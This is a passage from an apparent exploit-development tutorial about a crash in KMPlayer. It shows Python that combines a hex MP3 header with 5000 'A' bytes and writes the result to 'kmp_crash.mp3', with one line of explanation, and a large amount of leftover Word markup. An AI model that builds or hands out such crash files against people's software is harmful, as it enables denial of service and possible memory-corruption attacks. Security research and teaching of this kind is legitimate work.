00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">junk = "\x41"*5000</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">out_file = "kmp_crash.mp3"</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">exploit = header + junk</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">crashy = open(out_file,"w")</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">crashy.write(exploit)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">crashy.close()</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> </div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">The above code will create a MP3 file with name “kmp_crash.mp3” and the content will be header and 5000 “A”s.</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"></span><br />
<div style="font-family: inherit;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
